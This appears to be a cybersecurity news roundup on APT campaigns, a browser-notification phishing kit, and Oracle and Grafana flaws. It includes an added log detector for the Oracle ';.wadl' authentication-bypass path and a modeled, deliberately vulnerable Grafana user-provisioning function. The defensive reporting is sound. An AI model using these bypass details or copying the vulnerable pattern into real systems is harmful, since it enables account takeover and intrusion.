2025-11-24 AI Startup News

China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services

The China-linked advanced persistent threat (APT) group known as APT31 has been attributed to cyber attacks targeting the Russian information technology (IT) sector between 2024 and 2025 while staying undetected for extended periods of time. “In the period from 2024 to 2025, the Russian IT sector, especially companies working as contractors and integrators of solutions for government agencies, faced a series of targeted computer attacks,” Positive Technologies researchers Daniil Grigoryan and Varvara Koloskova said in a technical report. APT31, also known as Altaire, Bronze Vinewood, Judgement Panda, PerplexedGoblin, RedBravo, Red Keres, and Violet Typhoon (formerly Zirconium), is assessed to have been active since at least 2010. It has a track record of striking a wide range of sectors, including government, finance, aerospace and defense, high tech, construction and engineering, telecommunications, media, and insurance.

The cyber espionage group is primarily focused on gathering intelligence that can provide Beijing and state-owned enterprises with political, economic, and military advantages. In May 2025, the hacking crew was blamed by the Czech Republic for targeting its Ministry of Foreign Affairs. The attacks aimed at Russia are characterized by the use of legitimate cloud services, mainly those prevalent in the country, like Yandex Cloud, for command-and-control (C2) and data exfiltration in an attempt to blend in with normal traffic and escape detection. The adversary is also said to have staged encrypted commands and payloads in social media profiles, both domestic and foreign, while also conducting their attacks during weekends and holidays.

In at least one attack targeting an IT company, APT31 breached its network as far back as late 2022, before escalating the activity to coincide with the 2023 New Year holidays. In another intrusion detected in December 2024, the threat actors sent a spear-phishing email containing a RAR archive that, in turn, included a Windows Shortcut (LNK) responsible for launching a Cobalt Strike loader dubbed CloudyLoader via DLL side-loading. Details of this activity were previously documented by Kaspersky in July 2025, which identified some overlaps with a threat cluster known as EastWind. The Russian cybersecurity company also said it identified a ZIP archive lure that masqueraded as a report from the Ministry of Foreign Affairs of Peru to ultimately deploy CloudyLoader.

To facilitate subsequent stages of the attack cycle, APT31 has leveraged an extensive set of publicly available and custom tools. Persistence is achieved by setting up scheduled tasks that mimic legitimate applications, such as Yandex Disk and Google Chrome. Some of the tools are listed below:

- SharpADUserIP, a C# utility for reconnaissance and discovery
- SharpChrome.exe, to extract passwords and cookies from Google Chrome and Microsoft Edge browsers
- SharpDir, to search files
- StickyNotesExtract.exe, to extract data from the Windows Sticky Notes database
- Tailscale VPN, to create an encrypted tunnel and set up a peer-to-peer (P2P) network between the compromised host and their infrastructure
- Microsoft dev tunnels, to tunnel traffic
- Owawa, a malicious IIS module for credential theft
- AufTime, a Linux backdoor that uses the wolfSSL library to communicate with C2
- COFFProxy, a Golang backdoor that supports commands for tunneling traffic, executing commands, managing files, and delivering additional payloads
- VtChatter, a tool that uses Base64-encoded comments on a text file hosted on VirusTotal as a two-way C2 channel every two hours
- OneDriveDoor, a backdoor that uses Microsoft OneDrive as C2
- LocalPlugX, a variant of PlugX that’s used to spread within the local network rather than to communicate with C2
- CloudSorcerer, a backdoor that used cloud services as C2
- YaLeak, a .NET tool to upload information to Yandex Cloud

“APT31 is constantly replenishing its arsenal: although they continue to use some of their old tools,” Positive Technologies said. “As C2, attackers actively use cloud services, in particular, Yandex and Microsoft OneDrive services. Many tools are also configured to work in server mode, waiting for attackers to connect to an infected host.”

“In addition, the grouping exfiltrates data through Yandex’s cloud storage. These tools and techniques allowed APT31 to stay unnoticed in the infrastructure of victims for years. At the same time, attackers downloaded files and collected confidential information from devices, including passwords from mailboxes and internal services of victims.”

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks

Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push C2. “This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims across operating systems,” BlackFog researcher Brenda Robb said in a Thursday report. In these attacks, prospective targets are tricked into allowing browser notifications through social engineering on malicious or legitimate-but-compromised websites. Once a user agrees to receive notifications from the site, the attackers take advantage of the web push notification mechanism built into the web browser to send alerts that look like they have been sent by the operating system or the browser itself, leveraging trusted branding, familiar logos, and convincing language to maintain the ruse.

These include alerts about, say, suspicious logins or browser updates, along with a handy “Verify” or “Update” button that, when clicked, takes the victim to a bogus site. What makes the technique effective is that the entire process takes place through the browser, without first infecting the victim’s system by some other means. In that respect the attack resembles ClickFix: users are lured into following instructions that compromise their own systems, effectively bypassing traditional security controls.

Since the attack plays out via the web browser, it’s also a cross-platform threat: any browser on any platform that subscribes to the malicious notifications is effectively enlisted into the pool of clients, giving adversaries a persistent communication channel. Matrix Push C2 is offered as a malware-as-a-service (MaaS) kit to other threat actors. It’s sold directly through crimeware channels, typically via Telegram and cybercrime forums, under a tiered subscription model: about $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year.

“Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access,” Dr. Darren Williams, founder and CEO of BlackFog, told The Hacker News. “Matrix Push was first observed at the beginning of October and has been active since then. There’s no evidence of older versions, earlier branding, or long-standing infrastructure.

Everything indicates this is a newly launched kit.” The tool is accessible as a web-based dashboard, allowing users to send notifications, track each victim in real-time, determine which notifications the victims interacted with, create shortened links using a built-in URL shortening service, and even record installed browser extensions, including cryptocurrency wallets. “The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages,” Robb explained. “Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services.” Some of the supported notification verification templates are associated with well-known brands like MetaMask, Netflix, Cloudflare, PayPal, and TikTok. The platform also includes an “Analytics & Reports” section that allows its customers to measure the effectiveness of their campaigns and refine them as required.

“Matrix Push C2 shows us a shift in how attackers gain initial access and attempt to exploit users,” BlackFog said. “Once a user’s endpoint (computer or mobile device) is under this kind of influence, the attacker can gradually escalate the attack.” “They might deliver additional phishing messages to steal credentials, trick the user into installing a more persistent malware, or even leverage browser exploits to get deeper control of the system. Ultimately, the end goal is often to steal data or monetize the access, for example, by draining cryptocurrency wallets or exfiltrating personal information.”

Attacks Misusing Velociraptor on the Rise

The development comes as Huntress said it observed a “significant uptick” in attacks weaponizing the legitimate Velociraptor digital forensics and incident response (DFIR) tool over the past three months. On November 12, 2025, the cybersecurity vendor said threat actors deployed Velociraptor after obtaining initial access through exploitation of a flaw in Windows Server Update Services (CVE-2025-59287, CVSS score: 9.8), which was patched by Microsoft late last month.

Subsequently, the attackers are said to have launched discovery queries with the goal of conducting reconnaissance and gathering details about users, running services, and configurations. The attack was contained before it could progress further, Huntress added. The discovery shows that threat actors are not just using custom C2 frameworks, but are also employing readily available offensive security and incident response tools to their advantage. “We’ve seen threat actors use legitimate tools long enough to know that Velociraptor won’t be the first dual-use, open-source tool that will pop up in attacks – nor will it be the last,” Huntress researchers said.


CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated remote code execution. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0.

It was addressed by Oracle as part of its quarterly updates released last month. “Oracle Fusion Middleware contains a missing authentication for a critical function vulnerability, allowing unauthenticated remote attackers to take over Identity Manager,” CISA said. Searchlight Cyber researchers Adam Kues and Shubham Shah, who discovered the flaw, said it can permit an attacker to access API endpoints that, in turn, can allow them “to manipulate authentication flows, escalate privileges, and move laterally across an organization’s core systems.” Specifically, it stems from a bypass of a security filter that tricks protected endpoints into being treated as publicly accessible by simply adding “?WSDL” or “;.wadl” to any URI. This, in turn, is the result of a faulty allow-list mechanism based on regular expressions or string matching against the request URI.

“This system is very error-prone, and there are typically ways to trick these filters into thinking we’re accessing an unauthenticated route when we’re not,” the researchers noted. The authentication bypass can then be paired with a request to the “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus” endpoint to achieve remote code execution by sending a specially crafted HTTP POST. While the endpoint is only meant for checking the syntax of Groovy code and not executing it, Searchlight Cyber said it was able to “write a Groovy annotation that executes at compile time, even though the compiled code is not actually run.” The addition of CVE-2025-61757 to the KEV catalog comes days after Johannes B. Ullrich, the dean of research at the SANS Technology Institute, said an analysis of honeypot logs revealed several attempts to access the URL “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl” via HTTP POST requests between August 30 and September 9, 2025.

“There are several different IP addresses scanning for it, but they all use the same user agent, which suggests that we may be dealing with a single attacker,” Ullrich said. “Sadly, we did not capture the bodies for these requests, but they were all POST requests. The content-length header indicated a 556-byte payload.” This indicates that the vulnerability may have been exploited as a zero-day vulnerability, well before a patch was shipped by Oracle. The IP addresses from which the attempts originated are listed below:

- 89.238.132[.]76
- 185.245.82[.]81
- 138.199.29[.]153

In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary patches by December 12, 2025, to secure their networks.
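The two weaknesses described above, an allow-list that matches the raw request URI so that a “?WSDL” or “;.wadl” suffix makes a protected route look public, and the honeypot pattern of one User-Agent scanning from several source IPs, can both be turned into defender-side checks. The following is an added example, not code from Oracle, SANS or Searchlight Cyber; the log lines, the allow-listed paths and the User-Agent string are constructed, and the normalization shown is one generic safe approach rather than Oracle’s patch.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample access-log lines in combined log format; these are not
# the SANS honeypot records, and the IPs are documentation-range placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [31/Aug/2025:02:14:07 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1" 401 312 "-" "Mozilla/5.0 (constructed-scanner-ua)"
198.51.100.7 - - [02/Sep/2025:09:41:12 +0000] "GET /identity/faces/signin HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.22 - - [05/Sep/2025:11:03:51 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1" 401 312 "-" "Mozilla/5.0 (constructed-scanner-ua)"
198.51.100.9 - - [06/Sep/2025:18:20:33 +0000] "GET /ws/publicservice?WSDL HTTP/1.1" 200 2041 "-" "curl/8.4.0"
"""

# Paths that are genuinely unauthenticated in this hypothetical deployment.
# A safe allow-list is consulted with the normalized path, never the raw URI.
PUBLIC_PATHS = {"/identity/faces/signin", "/ws/publicservice"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)


def normalize_path(target: str) -> str:
    """Drop the query string and any per-segment matrix parameter (";...")
    so that "/a/b;.wadl?x=1" and "/a/b?WSDL" both resolve to "/a/b"."""
    path = urlsplit(target).path
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def has_decoy_suffix(target: str) -> bool:
    """True when the raw URI carries one of the two suffixes named in the report."""
    parts = urlsplit(target)
    if parts.query.upper() == "WSDL":
        return True
    return any(seg.lower().endswith(";.wadl") for seg in parts.path.split("/"))


def is_public(target: str) -> bool:
    """Allow-list decision made on the normalized path (the safe form)."""
    return normalize_path(target) in PUBLIC_PATHS


def find_suspicious(log_text: str) -> list[dict]:
    """Flag requests whose raw URI looks public only because of a decoy suffix
    while the normalized path is not on the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if has_decoy_suffix(target) and not is_public(target):
            hits.append({
                "ip": m.group("ip"),
                "method": m.group("method"),
                "target": target,
                "normalized": normalize_path(target),
                "ua": m.group("ua"),
            })
    return hits


def cluster_by_user_agent(hits: list[dict]) -> dict[str, list[str]]:
    """Group flagged source IPs by User-Agent; one UA across several IPs is the
    pattern Ullrich used to suggest a single scanning operator."""
    clusters = defaultdict(set)
    for h in hits:
        clusters[h["ua"]].add(h["ip"])
    return {ua: sorted(ips) for ua, ips in clusters.items()}


if __name__ == "__main__":
    for ua, ips in cluster_by_user_agent(find_suspicious(SAMPLE_LOG)).items():
        print(f"{ua}: {len(ips)} source IP(s) -> {ips}")
```

The legitimate “?WSDL” request to an allow-listed service is not flagged, which keeps the rule from alerting on ordinary SOAP metadata fetches.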


Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation

Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The vulnerability, tracked as CVE-2025-41115, carries a CVSS score of 10.0. It resides in the System for Cross-domain Identity Management (SCIM) component that allows automated user provisioning and management. First introduced in April 2025, it’s currently in public preview.

“In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow for overriding internal user IDs and lead to impersonation or privilege escalation,” Grafana’s Vardan Torosyan said. That said, successful exploitation hinges on both conditions being met:

- the enableSCIM feature flag is set to true
- the user_sync_enabled config option in the [auth.scim] block is set to true

The shortcoming affects Grafana Enterprise versions from 12.0.0 to 12.2.1. It has been addressed in the following versions of the software:

- Grafana Enterprise 12.0.6+security-01
- Grafana Enterprise 12.1.3+security-01
- Grafana Enterprise 12.2.1+security-01
- Grafana Enterprise 12.3.0

“Grafana maps the SCIM externalId directly to the internal user.uid; therefore, numeric values (e.g. ‘1’) may be interpreted as internal numeric user IDs,” Torosyan said.

“In specific cases this could allow the newly provisioned user to be treated as an existing internal account, such as the Admin, leading to potential impersonation or privilege escalation.” The analytics and observability platform said the vulnerability was discovered internally on November 4, 2025, during an audit and testing. Given the severity of the issue, users are advised to apply the patches as soon as possible to mitigate potential risks.
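The identifier-collision class of bug Torosyan describes, an externally supplied externalId copied into a uid field that the same lookup also accepts as a numeric internal ID, is easiest to see in a small model. The following is an added example and not Grafana’s code: the in-memory user store, the seeded admin record and the “scim:” namespacing mitigation are all constructed for illustration, and the hardened variant is one generic fix rather than Grafana’s actual patch.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    id: int            # internal numeric primary key
    uid: str           # string identifier exposed to provisioning (like user.uid)
    login: str
    is_admin: bool = False


class UserStore:
    """Tiny in-memory user table (constructed); the built-in admin is record 1."""

    def __init__(self) -> None:
        self.users: dict[int, User] = {1: User(1, "admin-uid-constructed", "admin", True)}
        self._next_id = 2

    def resolve(self, ref: str) -> Optional[User]:
        # Models the ambiguous lookup at the heart of the bug: the same field is
        # accepted either as a uid string or as a numeric internal id.
        if ref.isdigit():
            return self.users.get(int(ref))
        return next((u for u in self.users.values() if u.uid == ref), None)

    def by_uid(self, uid: str) -> Optional[User]:
        """Unambiguous lookup: only the uid column is consulted."""
        return next((u for u in self.users.values() if u.uid == uid), None)

    def create(self, uid: str, login: str) -> User:
        user = User(self._next_id, uid, login)
        self.users[user.id] = user
        self._next_id += 1
        return user


def provision_vulnerable(store: UserStore, external_id: str, login: str) -> User:
    """externalId copied straight into uid and resolved through the ambiguous
    lookup: a SCIM client sending externalId "1" is handed the admin record."""
    existing = store.resolve(external_id)
    if existing is not None:
        return existing
    return store.create(external_id, login)


def provision_hardened(store: UserStore, external_id: str, login: str) -> User:
    """Illustrative mitigation (not Grafana's patch): reject purely numeric
    externalId values, namespace the stored uid so it can never be confused with
    an internal numeric id, and look up by uid only."""
    if not external_id or external_id.isdigit():
        raise ValueError("externalId must be a non-numeric opaque string")
    uid = f"scim:{external_id}"
    existing = store.by_uid(uid)
    if existing is not None:
        return existing
    return store.create(uid, login)


if __name__ == "__main__":
    store = UserStore()
    print("vulnerable:", provision_vulnerable(store, "1", "mallory"))
    print("hardened:", provision_hardened(store, "ext-42", "mallory"))
```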

Google Brings AirDrop Compatibility to Android’s Quick Share Using Rust-Hardened Security

In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple’s equivalent, AirDrop, allowing users to more easily share files and photos between Android and iPhone devices. The cross-platform sharing feature is currently limited to the Pixel 10 lineup and works with iPhone, iPad, and macOS devices, with plans to expand to additional Android devices in the future. In order to transfer a file from a Pixel 10 phone over AirDrop, the only caveat is that the owner of the Apple device is required to make sure their iPhone (or iPad or Mac) is discoverable to anyone – which can be enabled for 10 minutes. Likewise, to receive content from an Apple device, Android device users will need to adjust their Quick Share visibility settings to Everyone for 10 minutes or be in Receive mode on the Quick Share page, according to a support document published by Google.

“We built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products,” Dave Kleidermacher, vice president of Platforms Security and Privacy at Google, said. At the heart of the feature is a multi-layered security approach that’s powered by the memory-safe Rust programming language to create a secure sharing channel that Google said eliminates entire classes of memory safety vulnerabilities, making its implementation resilient against attacks that attempt to exploit memory errors. The tech giant also noted that the feature does not rely on any workaround and that the data is not routed through a server, adding it’s open to working with Apple to enable “Contacts Only” mode in the future. “Google’s implementation of its version of Quick Share does not introduce vulnerabilities into the broader protocol’s ecosystem,” NetSPI, which carried out an independent assessment in August 2025, said.

“While it shares specific characteristics with implementations made by other manufacturers, this implementation is reasonably more secure. In fact, the process of file exchange is notably stronger, as it doesn’t leak any information, which is a common weakness in other manufacturers’ implementations.” That said, its analysis uncovered a low-severity information disclosure vulnerability (CVSS score: 2.1) that could permit an attacker with physical access to the device to access information, such as image thumbnails and SHA256 hashes of phone numbers and email addresses. It has since been addressed by Google. The development comes as Google said it blocked in India more than 115 million attempts to install sideloaded apps that request access to sensitive permissions for financial fraud.

The company also said it’s piloting a new feature in the country in collaboration with financial services like Google Pay, Navi, and Paytm to combat scams that trick users into opening the apps when sharing their screens. “Devices running Android 11+ now show a prominent alert if a user opens one of these apps while screen sharing on a call with an unknown contact,” Evan Kotsovinos, vice president of privacy, safety, and security at Google, said. “This feature provides a one-tap option to end the call and stop screen sharing, protecting users from potential fraud.” Lastly, Google said it’s also developing Enhanced Phone Number Verification (ePNV), which it described as a new Android-based security protocol that replaces SMS OTP flows with SIM-based verification to improve sign-in security.


Why IT Admins Choose Samsung for Mobile Security

Ever wonder how some IT teams keep corporate data safe without slowing down employees? Of course you have. Mobile devices are essential for modern work—but with mobility comes risk. IT admins, like you, juggle protecting sensitive data while keeping teams productive.

That’s why more enterprises are turning to Samsung for mobile security. Hey—you’re busy, so here’s a quick-read article on what makes Samsung Galaxy devices and Knox Suite really stand out.

Security built in. Management simplified.

Samsung Galaxy devices come with Samsung Knox built in at the manufacturing stage, creating a hardware foundation that extends visibility and control across your security infrastructure.

- Simplified management with Knox Suite: Samsung’s all-in-one package to manage and secure work devices grants centralized control without the need for extra tools or workflows (that got your attention!).
- Integrated security: Samsung Knox is built into both hardware and software, giving multi-layered protection against malware attacks.
- Government-grade protection: Secure boot, trusted execution environments, and more—that means these devices are ready for enterprise demands!

With Samsung Galaxy, security isn’t just software—it’s the foundation of your devices.

Strengthening Zero Trust without the hassle

Mobile threats can appear anywhere. To mitigate the risks, Samsung Galaxy devices are Zero Trust ready, while Samsung Knox enforces strict access controls within your systems. Let’s take a quick look:

- Device Integrity: Samsung Galaxy devices, managed or unmanaged, verify their integrity before connecting to corporate resources.
- Zero Trust Network Access (ZTNA): Businesses can get high-speed Zero Trust Network Access natively from Samsung Galaxy devices.
- Real-time security signals: Knox Asset Intelligence (part of Knox Suite - Enterprise Plan) sends almost-real-time device telemetry into security information and event management (SIEM) tools, so mobile threats appear alongside other alerts. Check out Samsung’s article on Knox Asset Intelligence for Microsoft Sentinel!

Think of it as a live dashboard for every device without adding extra complexity. Samsung Knox helps you stay strict without making life harder for your team—that’s a win-win!

Extending your EMM strategy… without adding headaches

Knox Suite amplifies the EMM tools you already use, further strengthening your enterprise mobility management.

IT admins get deeper security, smarter insights, and tighter control while keeping existing workflows intact. What’s more, it’s compatible with most EMM tools! With Knox Suite, you can:

- Equip your frontline with the tools they need to succeed. Leverage powerful features such as Knox Authentication Manager for seamless, secure access. And, ensure operational continuity of your Line of Business apps by enforcing OS compatibility through Knox E-FOTA.
- Gain unmatched control and security over your organization’s devices with Knox Mobile Enrollment, which allows you to securely lock devices to your organization–even after a factory reset–until released by an admin.
- Stay ahead of threats with the Knox Asset Intelligence security center dashboard, which provides a comprehensive look at your entire Samsung fleet, highlighting vulnerabilities and patch levels for unique chipsets.

In short, Knox Suite enhances the value of your EMM tools—providing IT with enterprise-grade security and visibility without slowing day-to-day operations.

Why Samsung is a trusted partner for IT admins

Here’s the deal: Samsung’s Knox Suite helps to manage and secure work devices for today’s challenges and tomorrow’s threats.

- Protect sensitive data: Layered hardware and software defences keep corporate information safe.
- Maintain productivity: Users stay productive while IT remains in control.
- Future-ready: Knox evolves alongside security threats, policies, and enterprise needs.

Security doesn’t have to be complicated—it just needs the right foundation. By choosing Samsung, enterprises can confidently embrace mobility while safeguarding their most valuable assets: data and reputation. Want to be the IT hero who brought security and productivity to your team? Here’s all you need to know!

This article is a contributed piece from one of our valued partners.

APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains

A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. “While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan,” Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez said. “This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.” APT24, also called Pitty Tiger, is the moniker assigned to a suspected Chinese hacking group that has targeted government, healthcare, construction and engineering, mining, non-profit, and telecommunications sectors in the U.S. and Taiwan.

The group is also known to engage in cyber operations where the goal is intellectual property theft, specifically focusing on information that makes organizations competitive within their fields, per Google. According to a July 2014 report from FireEye, the adversary is believed to have been active as early as 2008, with the attacks leveraging phishing emails to trick recipients into opening Microsoft Office documents that, in turn, exploit known security flaws in the software (e.g., CVE-2012-0158 and CVE-2014-1761) to infect systems with malware. Some of the malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader called MM RAT (aka Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable malware put to use by the threat actor is a backdoor named Taidoor (aka Roudan).

APT24 is assessed to be closely related to another advanced persistent threat (APT) group called Earth Aughisky, which has also deployed Taidoor in its campaigns and has leveraged infrastructure previously attributed to APT24 as part of attacks distributing another backdoor referred to as Specas. Both the malware strains, per an October 2022 report from Trend Micro, are designed to read proxy settings from a specific file “%systemroot%\system32\sprxx.dll.” The latest findings from GTIG show that the BADAUDIO campaign has been underway since November 2022, with the attackers using watering holes, supply chain compromises, and spear-phishing as initial access vectors. A highly obfuscated malware written in C++, BADAUDIO uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that’s capable of downloading, decrypting, and executing an AES-encrypted payload from a hard-coded command and control (C2) server. It works by gathering and exfiltrating basic system information to the server, which responds with the payload to be run on the host.

In one case, it was a Cobalt Strike Beacon.

[Figure: BADAUDIO campaign overview]

“BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications,” GTIG said. “Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.” From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites to inject malicious JavaScript code that specifically excludes visitors coming from macOS, iOS, and Android, generates a unique browser fingerprint of the remaining visitors using the FingerprintJS library, and serves them a fake pop-up urging them to download BADAUDIO under the guise of a Google Chrome update. Then, starting in July 2024, the hacking group breached a regional digital marketing firm in Taiwan to orchestrate a supply chain attack by injecting the malicious JavaScript into a widely used JavaScript library that the company distributed, effectively allowing it to hijack more than 1,000 domains.

The modified third-party script is configured to reach out to a typosquatted domain impersonating a legitimate Content Delivery Network (CDN) and fetch the attacker-controlled JavaScript, which fingerprints the machine and then, after validation, serves the pop-up to download BADAUDIO. “The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts,” Google said. “This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain.”

[Figure: Compromised JS supply chain attack to deliver BADAUDIO malware]

“However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.” APT24 has also been observed conducting targeted phishing attacks since August 2024, using lures related to an animal rescue organization to trick recipients into responding and ultimately deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages come fitted with tracking pixels so the attackers can confirm whether the emails were opened by the targets and tailor their efforts accordingly.

“The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage,” Google said.

China-Nexus APT Group Targets Southeast Asia

The disclosure comes as CyberArmor detailed a sustained espionage campaign orchestrated by a suspected China-nexus threat actor against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. The activity has been codenamed Autumn Dragon. The attack chain commences with a RAR archive likely sent as an attachment in spear-phishing messages that, when extracted, exploits a WinRAR security flaw (CVE-2025-8088, CVSS score: 8.8) to launch a batch script (“Windows Defender Definition Update.cmd”) that sets up persistence to ensure that the malware is launched automatically when the user logs in to the system the next time.

It also downloads a second RAR archive hosted on Dropbox via PowerShell. The RAR archive contains two files, a legitimate executable (“obs-browser-page.exe”) and a malicious DLL (“libcef.dll”). The batch script then runs the binary to sideload the DLL, which then communicates with the threat actor over Telegram to fetch commands (“shell”), capture screenshots (“screenshot”), and drop additional payloads (“upload”). “The bot controller (threat actor) uses these three commands to gather information and perform reconnaissance of the victim’s computer and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said.

“This design enables the controller to remain stealthy and evade detection.” The third stage once again involves the use of DLL side-loading to launch a rogue DLL (“CRClient.dll”) by using a real binary (“Creative Cloud Helper.exe”), which then decrypts and runs shellcode responsible for loading and executing the final payload, a lightweight implant written in C++ that can communicate with a remote server (“public.megadatacloud[.]com”) and supports eight different commands:

- 65, to run a specified command using “cmd.exe,” gather the result, and exfiltrate it back to the C2 server
- 66, to load and execute a DLL
- 67, to execute shellcode
- 68, to update configuration
- 70, to read a file supplied by the operator
- 71, to open a file and write the content supplied by the operator
- 72, to get/set the current directory
- 73, to sleep for a random interval and terminate itself

While the activity has not been tied to a specific threat actor or group, it’s possibly the work of a China-nexus group possessing intermediate operational capabilities. This assessment is based on the adversary’s continued targeting of countries surrounding the South China Sea. “The attack campaign is targeted,” the researchers said. “Throughout our analysis, we frequently observed the next stages being hosted behind Cloudflare, with geo-restrictions enabled, as well as other restrictions such as only allowing specific HTTP User Agents.”

SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny

The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, which alleged that the company had misled investors about the security practices that preceded the 2020 supply chain attack. In a joint motion filed November 20, 2025, the SEC, SolarWinds, and its CISO Timothy G. Brown asked the court to voluntarily dismiss the case.

The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.” The SEC had accused SolarWinds and Brown in October 2023 of “fraud and internal control failures,” alleging that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks. The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect the company’s assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29. “Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.

However, in July 2024, the U.S. District Court for the Southern District of New York (SDNY) threw out most of these allegations, stating “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.” Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack. In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.”

Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity

Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.

Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them. “There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.” Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked. “This may also impact Oauth access for customer connections while the review is taking place,” Gainsight said.

“No suspicious activity related to Hubspot has been observed at this point.” In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce by compromising third-party OAuth tokens to potentially gain unauthorized access. The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances this past August. According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1,000 organizations. Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the earlier attack.

